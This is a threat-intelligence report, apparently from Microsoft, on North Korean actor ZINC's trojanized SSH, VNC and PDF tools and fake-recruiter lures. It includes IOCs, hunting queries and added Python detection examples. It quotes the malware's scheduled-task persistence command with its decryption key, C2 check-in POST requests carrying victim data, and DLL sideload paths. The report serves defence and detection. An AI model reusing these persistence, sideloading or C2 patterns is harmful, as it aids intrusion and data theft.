
ZINC weaponizes legitimate open-source software


Microsoft has recently discovered a range of social engineering activity by an actor we track as ZINC that weaponizes legitimate open-source software. The Microsoft Threat Intelligence Center (MSTIC) has observed activity targeting employees of organizations in multiple industries, including media, defense and aerospace, and IT services, in the US, UK, India, and Russia. Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based in North Korea whose objectives include espionage, data theft, financial gain, and network destruction.

Beginning in June 2022, ZINC employed conventional social engineering tactics, initially making contact with individuals on LinkedIn to build trust with their targets. Once a connection was established, ZINC encouraged continued communication over WhatsApp, which served as the channel for delivering their malicious payloads.

MSTIC observed ZINC using a range of open-source software in these attacks, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording installer. ZINC was observed attempting to move laterally and exfiltrate data from victim networks, and the actors have successfully compromised some organizations since June 2022. Mandiant also reported on the ongoing campaign involving the weaponized PuTTY earlier last month. Because the platforms and software ZINC uses in this campaign are so widely used, ZINC could pose a significant threat to individuals and organizations across all industries and regions.

Microsoft Defender for Endpoint provides comprehensive protection against ZINC-specific tools and malware, including ZetaNile. The hunting queries provided at the end of this article let customers search their environments thoroughly for relevant indicators. As with any observed nation-state actor activity, Microsoft directly notifies customers who have been targeted or compromised, giving them the information they need to secure their accounts.

Who is ZINC?

ZINC is a highly operational, destructive, and sophisticated nation-state activity group. Active since 2009, the group gained public notoriety in 2014 following its successful attack on Sony Pictures Entertainment. Microsoft has identified FoggyBrass and PhantomStar as two of the custom remote access tools (RATs) in ZINC's inventory.

Microsoft researchers have observed ZINC actors relying primarily on spear-phishing, but they have also used social engineering on social networking platforms and strategic website compromises to achieve their goals. ZINC targets employees of the organizations it is trying to infiltrate and attempts to persuade them to open weaponized documents containing malicious macros or to install seemingly benign applications. Security researchers have also been the subject of focused attacks on Twitter and LinkedIn.

ZINC attacks appear to be motivated by conventional cyberespionage, theft of personal and corporate data, financial gain, and corporate network destruction. ZINC attacks share many characteristics with state-sponsored activity, including heightened operational security, sophisticated malware that evolves over time, and politically motivated targeting.

From late April through mid-September 2022, ZINC, also known as Labyrinth Chollima and Black Artemis, was seen carrying out this campaign.

Figure 1. Attack flow diagram for the recent ZINC campaign

ZINC: Observed actor activity

Impersonation and establishing contact

LinkedIn Threat Prevention and Defense detected ZINC creating fake profiles claiming to be recruiters at technology, defense, and media entertainment companies, with the goal of moving targets away from LinkedIn to the encrypted messaging app WhatsApp for malware delivery. ZINC primarily targeted engineers and technical support professionals working at media and IT companies located in the US, UK, and India. Targets received outreach tailored to their profession or background and were encouraged to apply for an open position at one of several legitimate companies. In accordance with its policies, LinkedIn swiftly terminated the accounts identified in these attacks that were associated with inauthentic or fraudulent behavior.

Figure 2. Fraudulent recruiter profile

Multiple methods used for delivery of ZetaNile

Microsoft has identified at least five delivery methods based on trojanized open-source applications that carry malicious payloads and shellcode; the implants are tracked as the ZetaNile malware family. The ZetaNile implants, also referred to as BLINDINGCAN, have been discussed in reports from CISA and JPCERT. The implant DLLs in the ZetaNile family are either encrypted with custom algorithms or packed with commercial software protectors such as Themida and VMProtect.

As illustrated in Figure 3, the malicious DLL's payload is decrypted with a specific key that is supplied when a legitimate Windows process is abused through DLL search order hijacking. The ZetaNile implants send command-and-control (C2) HTTP requests to known compromised C2 domains, using either custom encryption schemes or AES. These C2 communications can blend in with normal traffic because the victim information is encoded in parameters with innocuous-looking names such as gametype or bbs in the HTTP POST bodies.

The weaponization of SSH clients with ZINC

After making contact with a target, ZINC operationalized malicious versions of the SSH clients PuTTY and KiTTY, which served as the entry point for the ZetaNile implant. Both applications provide terminal emulation for a number of networking protocols, which makes them attractive to the users ZINC typically targets. The weaponized versions were usually delivered as ISO or ZIP archives. Inside the archive, the recipient finds a ReadMe.txt file and an executable. As part of the evolution of ZINC's malware development and an effort to evade conventional defenses, simply running the bundled executable does not drop the ZetaNile implant; the implant is deployed only when the SSH client is used to connect to the IP address specified in the ReadMe.txt file. Below is a sample of what that file might contain:

Server: 137[.]184[.]15[.]189
User: [redacted]
Pass: [redacted]

Weaponized PuTTY malware

ZINC has used a trojanized PuTTY as part of its attack chain for many years. The most recent iteration establishes persistence on infected devices through scheduled tasks; Mandiant recently reported on this activity. The malicious PuTTY.exe is configured to install the EventHorizon implant as C:\ProgramData\colorui.dll and to copy C:\Windows\System32\colorcpl.exe to C:\ProgramData\colorcpl.exe. Through DLL search order hijacking, ZINC loads the second-stage malware colorui.dll and decrypts the payload with the key "0CE1241A44557AA438F27BC6D4ACA246", which is then used for command and control. Once connected to the C2 server, the attackers can use the compromised device to install additional malware for different purposes.

As part of the weaponized PuTTY's configuration, a daily scheduled task named PackageColor is created to establish persistence. ZINC achieves this with the command shown in Figure 3 (the full command line is also listed in the indicators of compromise table below):

Figure 3. PuTTY – scheduled task as part of persistence
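The persistence step above is a good place to hunt, because the task action combines three things that rarely occur together in legitimate tasks: an indirect launch via cmd.exe /c start /b, a binary under a user-writable directory, and a 32-hex-character argument that serves as the payload decryption key. The following is an added example (not code from the original report or from Microsoft) that parses schtasks /CREATE command lines, such as the one captured from the weaponized PuTTY, and scores them on those three traits. All sample command lines other than the first are constructed for the example; the function names are this example's own.

```python
import re

# Constructed sample command lines for this example. The first mirrors the schtasks
# invocation attributed to the weaponized PuTTY in this report; the others are invented
# benign-looking tasks used to show what the checks do and do not flag.
SAMPLE_COMMAND_LINES = [
    r'c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 '
    r'/TR "C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe '
    r'0CE1241A44557AA438F27BC6D4ACA246" /TN PackageColor /F',
    r'schtasks.exe /Create /SC DAILY /TN "VendorUpdate" /TR "C:\Program Files\Vendor\update.exe" /F',
    r'schtasks.exe /create /tn Backup /tr "C:\ProgramData\Backup\backup.exe --nightly" /sc daily',
    r'C:\Windows\System32\svchost.exe -k netsvcs -p',
]

# Locations a standard user can write to; a task payload living here is a weak signal on its own.
USER_WRITABLE_ROOTS = (r"c:\programdata", r"c:\users", "%appdata%", "%localappdata%", "%temp%")

TR_ARG = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)   # task action (/TR)
TN_ARG = re.compile(r'/tn\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)   # task name (/TN)
CMD_START_B = re.compile(r"cmd\.exe\s+/c\s+start\s+/b\b", re.IGNORECASE)
HEX32 = re.compile(r"\b[0-9a-f]{32}\b", re.IGNORECASE)             # 128-bit key passed as argv


def parse_task_creation(cmdline):
    """Return (task_name, action) for a schtasks /create command line, else None."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    tr = TR_ARG.search(cmdline)
    if tr is None:
        return None
    action = tr.group(1) if tr.group(1) is not None else tr.group(2)
    tn = TN_ARG.search(cmdline)
    name = ""
    if tn is not None:
        name = tn.group(1) if tn.group(1) is not None else tn.group(2)
    return name, action


def task_risk_reasons(action):
    """List the traits of a task action that resemble the PackageColor persistence pattern."""
    low = action.lower()
    reasons = []
    if CMD_START_B.search(action):
        reasons.append("payload launched indirectly via cmd.exe /c start /b")
    if any(root in low for root in USER_WRITABLE_ROOTS):
        reasons.append("payload lives in a user-writable location")
    if HEX32.search(action):
        reasons.append("32-hex-character argument resembling an embedded decryption key")
    return reasons


def find_suspicious_tasks(cmdlines, min_reasons=2):
    """Return (task_name, action, reasons) for task creations with at least min_reasons hits."""
    findings = []
    for cmdline in cmdlines:
        parsed = parse_task_creation(cmdline)
        if parsed is None:
            continue
        name, action = parsed
        reasons = task_risk_reasons(action)
        if len(reasons) >= min_reasons:
            findings.append((name, action, reasons))
    return findings


if __name__ == "__main__":
    for name, action, reasons in find_suspicious_tasks(SAMPLE_COMMAND_LINES):
        print(f"[!] task {name!r}: {action}")
        for reason in reasons:
            print(f"    - {reason}")
```

Requiring at least two of the three traits keeps ordinary tasks that merely run from ProgramData (the constructed "Backup" task) out of the results, while the PackageColor command line matches all three. The same functions can be fed process-creation telemetry where the parent is schtasks.exe, or the output of schtasks /Query /XML if the actions are extracted first.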

Weaponized KiTTY malware

ZINC has long used a weaponized version of PuTTY, but only recently expanded its toolset to include a weaponized KiTTY, a fork of PuTTY. The application collects the target system's username and hostname and sends them over TCP/22 to the hardcoded IP address 172[.]93[.]201[.]253. The malicious KiTTY program performs several decoding steps before establishing a successful TCP connection to the server at 137[.]184[.]15[.]189, after which it drops the malware as %AppData%\mscoree.dll. The mscoree.dll file is the embedded ZetaNile payload, identified as EventHorizon. As with ZINC's PuTTY, the actor uses DLL search order hijacking to load malicious DLLs that run in the context of legitimate Windows processes, notably through %AppData%\KiTTY\PresentationHost.exe -EmbeddingObject.

Figure 4. KiTTY – DLL search order hijacking

The mscoree.dll malware is modular: after a successful connection to the compromised C2 domain, the attackers can use the established C2 channel to push additional malware to the target system as needed. For example, the attackers could run C:\ProgramData\Cisco\fixmapi.exe -s AudioEndpointBuilder to load a malicious mapistub.dll retrieved from the C2 server. The HTTP POST requests carry a unique ID in the gametype field and a hardcoded value in the type field, which are used to track malware campaign activity. A sample request is shown below:

POST /wp-includes/php-compat/compat.php HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Host: olidhealth[.]com
Connection: Keep-Alive
Cache-Control: no-cache  

gametype=[UniqueId]&type=O8Akm8aV09Nw412KoWJds

Weaponized TightVNC Viewer

Starting in September 2022, ZINC was observed using a trojanized TightVNC Viewer that was delivered to a target alongside a weaponized SSH tool over WhatsApp. The PDB path for this malware is distinctive:

N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb

The weaponized TightVNC Viewer was frequently distributed over online services such as WhatsApp as ZIP archives or job description-themed ISO files. Inside the archive, the recipient finds a ReadMe.txt file and an executable. The text file contains the following:

Platform: 2nd from the list
User: [redacted]
Pass: [redacted]

As part of the actor's latest technique for evading conventional defenses, the malicious TightVNC Viewer ships with a pre-populated list of remote hosts and is configured to install the backdoor only when the user selects ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu, as shown in Figure 5:

Figure 5. Weaponized TightVNC Viewer – user interface

As part of the victim's C2 check-in, the malware sends the victim's username and hostname to 44[.]238[.]74[.]84 and establishes VNC sessions to the same IP on TCP/5900. Once a connection to that server has been made, the second-stage DLL payload embedded in TightVNC.exe is loaded in memory to begin C2 communication with a known compromised domain.

The weaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer with ZINC

Trojanized versions of Sumatra PDF Reader and the muPDF/Subliminal Recording installer are two malicious PDF-reader packages that ZINC has operationalized as entry points for the ZetaNile implant. This delivery method is commonly used with fake job postings sent to targets seeking employment in the IT and defense industries. The weaponized versions were usually delivered as ZIP archives containing a single executable. In contrast to the malicious Sumatra PDF Reader, which is a fully functional PDF reader that loads the implant from a crafted PDF, the muPDF/Subliminal Recording installer can install the backdoor without loading any malicious PDF file.

Trojanized Sumatra PDF Reader

ZINC has used SecurePDF.exe, a trojanized version of Sumatra PDF Reader, since at least 2019, and it remains unique ZINC tradecraft. SecurePDF.exe is a modular loader that installs the ZetaNile implant when it opens a weaponized job application-themed PDF. The crafted PDF carries the header "SPV005", a decryption key, an encrypted second-stage implant payload, and an encrypted decoy PDF that is rendered when the file is opened in the reader.

Once the second-stage malware has been loaded in memory, the victim's hostname and device information are sent to the C2 server as part of the check-in procedure, using custom encoding schemes. Over the C2 connection, the attackers can then deliver additional malware to the compromised devices as needed.

Figure 6. SecurePDF interface

Trojanized muPDF/Subliminal Recording installer

In the trojanized muPDF/Subliminal Recording installer, Setup.exe is configured to check for the existence of the file path ISSetupPrerequisites\Setup64.exe and, after extracting the executable embedded in setup.exe, to write C:\colrctl\colorui.dll to disk. It then copies ColorCpl.exe from C:\Windows\System32 to ColorCtrl. The malicious installer creates a new process, C:\colorctrl\colorcpl.exe, with the argument C3A9B30B6A313F289297C9A36730DB6D, which is passed to colorui.dll as the decryption key for the second stage of the infection. For the victim check-in, colorui.dll, which Microsoft tracks as part of the EventHorizon malware family, is injected into credwiz.exe or iexpress.exe to perform C2 HTTP requests and retrieve additional malware. A sample request is shown below:

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &article=[encrypted payload] 
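The two check-in requests shown above (the KiTTY POST with gametype/type parameters and the muPDF/Subliminal Recording POST with bbs/article parameters) share a structure that is easy to match in proxy or packet-capture data: a form-encoded POST to one of the compromised domain/path pairs listed in the indicators table, sent with one of the hardcoded user agents, whose body carries encoded victim data under innocuous parameter names. The following is an added example, not code from the original report or from Microsoft, that parses raw HTTP requests and reports which of those traits match. The sample requests are constructed for this example, modelled on the two captures above with invented payload values; the function names are this example's own.

```python
from urllib.parse import parse_qs

# Compromised domain/path pairs, as listed in the indicators of compromise in this report.
C2_PATHS = {
    "olidhealth.com": "/wp-includes/php-compat/compat.php",
    "hurricanepub.com": "/include/include.php",
    "turnscor.com": "/wp-includes/contacts.php",
    "elite4print.com": "/support/support.asp",
    "cats.runtimerec.com": "/db/dbconn.php",
    "recruitment.raystechserv.com": "/lib/artichow/BarPlotDashboard.object.php",
}

# Hardcoded implant user agents from the indicators table (exact-match strings).
HARDCODED_UAS = {
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)",
}

# Parameter-name pairs the implants use to carry encoded victim data in the POST body.
CHECKIN_PARAM_SETS = ({"gametype", "type"}, {"bbs", "article"})

# Constructed sample requests (invented payload values), modelled on the captures above.
SAMPLE_REQUESTS = [
    "POST /wp-includes/php-compat/compat.php HTTP/1.1\r\n"
    "Accept: text/*\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: olidhealth.com\r\n\r\n"
    "gametype=1A2B3C4D&type=O8Akm8aV09Nw412KoWJds",
    "POST /support/support.asp HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)\r\n"
    "Host: www.elite4print.com\r\n\r\n"
    "bbs=QUJDREVG=&article=R0hJSktM",
    # Benign form post, constructed to show a non-match.
    "POST /login HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/105.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: intranet.example.com\r\n\r\n"
    "username=jdoe&remember=1",
]


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers (lower-cased names) and body."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body.strip()}


def assess_request(raw):
    """Return the reasons a request matches the ZetaNile check-in pattern (empty list if none)."""
    req = parse_http_request(raw)
    reasons = []
    host = req["headers"].get("host", "").lower()
    bare_host = host[4:] if host.startswith("www.") else host   # the IOC list omits "www."
    if req["method"] == "POST" and C2_PATHS.get(bare_host) == req["path"]:
        reasons.append("POST to known compromised C2 path %s%s" % (host, req["path"]))
    if req["headers"].get("user-agent") in HARDCODED_UAS:
        reasons.append("hardcoded implant user agent")
    params = set(parse_qs(req["body"], keep_blank_values=True))
    for wanted in CHECKIN_PARAM_SETS:
        if wanted <= params:
            reasons.append("check-in parameters %s in POST body" % sorted(wanted))
    return reasons


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        req = parse_http_request(raw)
        print(req["headers"].get("host"), req["path"], assess_request(raw) or "no match")
```

The parameter-name check is intentionally kept separate from the domain and user-agent checks: the compromised sites and the exact user-agent strings are the parts of the pattern most likely to change between campaigns, whereas a form-encoded POST whose only fields are gametype/type or bbs/article is an unusual shape for legitimate web traffic and is worth reviewing even when the host is not yet on the list.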

Microsoft will continue to monitor ZINC activity and implement protections for our customers. The detections and IOCs currently in place across our security solutions are listed below.

Recommended customer actions

The following mitigations address the techniques the actor used, as described in the "Observed actor activity" section:

  • Use the indicators of compromise provided to investigate whether they exist in your environment and assess for potential intrusion.
  • Block inbound traffic from the IPs listed in the "Indicators of compromise" table.
  • Review all authentication activity for remote access infrastructure, paying particular attention to accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.
  • Enable multifactor authentication (MFA) and ensure it is enforced for all remote connectivity to mitigate the risk of stolen credentials. NOTE: Microsoft strongly encourages all customers to download and use password-less solutions such as Microsoft Authenticator to secure their accounts.
  • Educate end users about preventing malware infections, including ignoring or deleting unsolicited and unexpected emails that carry ISO attachments. Encourage end users to practice good credential hygiene, limit the use of accounts with local or domain admin privileges, and enable Microsoft Defender Firewall to prevent malware infection and stifle propagation.
  • Educate end users about protecting personal and business information on social media, filtering unsolicited communication, identifying spear-phishing emails and watering holes, and reporting reconnaissance attempts and other suspicious activity.

Indicators of compromise (IOCs)

The IOCs identified during our investigation are listed below. We encourage customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator | Type | Description
--- | --- | ---
Amazon-KiTTY.exe | File name | 
Amazon_IT_Assessment.iso | File name | 
IT_Assessment.iso | File name | 
amazon_assessment_test.iso | File name | 
SecurePDF.exe | File name | 
C:\ProgramData\Comms\colorui.dll | File path | Malicious PuTTY implant
%APPDATA%\KiTTY\mscoree.dll | File path | Malicious KiTTY implant
172.93.201[.]253 | IP address | Adversary C2 server
137.184.15[.]189 | IP address | Adversary SSH server
44.238.74[.]84 | IP address | Hard-coded VNC server IP for malicious TightVNC
c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR "C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246" /TN PackageColor /F | Scheduled task name | Putty.exe – scheduled task
1492fa04475b89484b5b0a02e6ba3e52544c264c294b57210404b96b65e63266 | SHA-256 | Malicious Putty.exe
aaad412aeb0f98c2c27bb817682f08673902a48b65213091534f96fe6f5494d9 | SHA-256 | Malicious colorui.dll
63cddab76e9d63e3cbea421b607342735d924e462c40f3917b1b5fbdf8d4a20d | SHA-256 | Malicious Amazon-Kitty.exe
e1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10 | SHA-256 | Malicious KiTTY implant for mscoree.dll
c5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf | SHA-256 | Weaponized Sumatra PDFReader.exe
71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55 | SHA-256 | Weaponized muPDF/Subliminal Recording installer
olidhealth[.]com/wp-includes/php-compat/compat.php | Compromised domain | 
hurricanepub[.]com/include/include.php | Compromised domain | 
turnscor[.]com/wp-includes/contacts.php | Compromised domain | 
elite4print[.]com/support/support.asp | Compromised domain | 
cats.runtimerec[.]com/db/dbconn.php | Compromised domain | 
recruitment.raystechserv[.]com/lib/artichow/BarPlotDashboard.object.php | Compromised domain | 
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39 | User agent | Hardcoded Kitty.exe UA
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E) | User agent | Hardcoded SecurePDF.exe UA
N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb | PDB path | PDB path for malicious TightVNC
37e30dc2faaabaf93f0539ffbde032461ab63a2c242fbe6e1f60a22344c8a334 | SHA-256 | Malicious TightVNC
14f736b7df6a35c29eaed82a47fc0a248684960aa8f2222b5ab8cdad28ead745 | SHA-256 | Malicious TightVNC

NOTE: This list of indicators should not be considered exhaustive for the activity being monitored.

Detections

Microsoft Defender Antivirus

Customers of Microsoft Defender Antivirus and Microsoft Defender for Endpoint should watch for detections of behavior associated with these attacks under the following family names:

  • ZetaNile
  • EventHorizon
  • FoggyBrass
  • PhantomStar

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts may indicate activity associated with this threat. Note that these alerts can also be triggered by unrelated threat activity.

  • Suspicious Task Scheduler activity
  • Suspicious connection to remote service
  • A suspicious file was observed
  • An executable loaded an unexpected dll
  • Possible theft of remote session credentials

Microsoft 365 Defender

Microsoft 365 Defender customers can use the following advanced hunting queries to locate related activity:

  • Suspicious mapistub.dll file creation

Surface mapistub.dll files created by PresentationHost.exe, which is likely being used for DLL search order hijacking.

DeviceFileEvents
| where InitiatingProcessFileName =~ "presentationhost.exe"
| where FileName =~ "mapistub.dll"

  • Suspicious mscoree.dll file creation

Surface mscoree.dll files created by KiTTY or PuTTY processes.

DeviceFileEvents
| where InitiatingProcessFileName hassuffix "kitty.exe" or InitiatingProcessVersionInfoInternalFileName has "PuTTY"
| where FileName =~ "mscoree.dll"

  • Suspicious colorcpl.exe image load

Surface instances of DLL search order hijacking in which the colorcpl.exe process loads colorui.dll from a path other than the expected one.

DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "colorcpl.exe"
| where FileName =~ "colorui.dll" and not(FolderPath has_any("system32", "syswow64", "program files"))
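The three hunting queries above express the same idea from different angles: a legitimate signed process (PresentationHost.exe, KiTTY/PuTTY, colorcpl.exe) writing or loading a DLL name that the real application would never place in a user-writable directory. For environments that export Defender telemetry or need to port the rules to another SIEM, the following added example (not code from the original report or from Microsoft) re-implements the three queries as Python filters over endpoint events, including the "expected path" exclusion for the colorcpl.exe sideload. The events are constructed for the example; the field names only loosely mirror the Defender tables, and the rule and function names are this example's own.

```python
# Folders the real colorui.dll is expected to load from; mirrors the has_any() exclusion above.
EXPECTED_DLL_ROOTS = ("system32", "syswow64", "program files")

# Constructed sample telemetry for this example. The records are invented; their field
# names only loosely mirror DeviceFileEvents / DeviceImageLoadEvents.
SAMPLE_EVENTS = [
    {"table": "DeviceFileEvents", "initiating_process": "PresentationHost.exe",
     "initiating_internal_name": "", "file_name": "mapistub.dll",
     "folder_path": r"C:\ProgramData\Cisco"},
    {"table": "DeviceFileEvents", "initiating_process": "Amazon-KiTTY.exe",
     "initiating_internal_name": "", "file_name": "mscoree.dll",
     "folder_path": r"C:\Users\victim\AppData\Roaming\KiTTY"},
    {"table": "DeviceFileEvents", "initiating_process": "putty.exe",
     "initiating_internal_name": "PuTTY", "file_name": "mscoree.dll",
     "folder_path": r"C:\Users\victim\AppData\Roaming"},
    {"table": "DeviceImageLoadEvents", "initiating_process": "colorcpl.exe",
     "initiating_internal_name": "", "file_name": "colorui.dll",
     "folder_path": r"C:\ProgramData\PackageColor"},
    # Benign: the genuine colorui.dll loaded from System32 must not fire.
    {"table": "DeviceImageLoadEvents", "initiating_process": "colorcpl.exe",
     "initiating_internal_name": "", "file_name": "colorui.dll",
     "folder_path": r"C:\Windows\System32"},
    # Benign: KiTTY writing its own session file must not fire.
    {"table": "DeviceFileEvents", "initiating_process": "kitty.exe",
     "initiating_internal_name": "", "file_name": "sessions.ini",
     "folder_path": r"C:\Users\victim\AppData\Roaming\KiTTY"},
]


def rule_mapistub_creation(ev):
    """PresentationHost.exe creating mapistub.dll (first query above)."""
    return (ev["table"] == "DeviceFileEvents"
            and ev["initiating_process"].lower() == "presentationhost.exe"
            and ev["file_name"].lower() == "mapistub.dll")


def rule_mscoree_creation(ev):
    """A KiTTY or PuTTY process creating mscoree.dll (second query above).

    KQL 'hassuffix' becomes endswith(); KQL 'has' is approximated with a
    case-insensitive substring test on the internal file name.
    """
    proc = ev["initiating_process"].lower()
    internal = ev["initiating_internal_name"].lower()
    return (ev["table"] == "DeviceFileEvents"
            and (proc.endswith("kitty.exe") or "putty" in internal)
            and ev["file_name"].lower() == "mscoree.dll")


def rule_colorcpl_sideload(ev):
    """colorcpl.exe loading colorui.dll from outside the expected folders (third query)."""
    folder = ev["folder_path"].lower()
    return (ev["table"] == "DeviceImageLoadEvents"
            and ev["initiating_process"].lower() == "colorcpl.exe"
            and ev["file_name"].lower() == "colorui.dll"
            and not any(root in folder for root in EXPECTED_DLL_ROOTS))


RULES = {
    "Suspicious mapistub.dll file creation": rule_mapistub_creation,
    "Suspicious mscoree.dll file creation": rule_mscoree_creation,
    "Suspicious colorcpl.exe image load": rule_colorcpl_sideload,
}


def hunt(events):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev))
    return hits


if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {ev['initiating_process']} -> {ev['folder_path']}\\{ev['file_name']}")
```

Running it over the constructed events flags the four malicious records and leaves the two benign ones untouched. The path exclusion in the third rule is what keeps the genuine colorui.dll load quiet, and it is also the part to tune first if the rule is noisy: any folder a standard user can write to, not only ProgramData, is a plausible sideload location.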
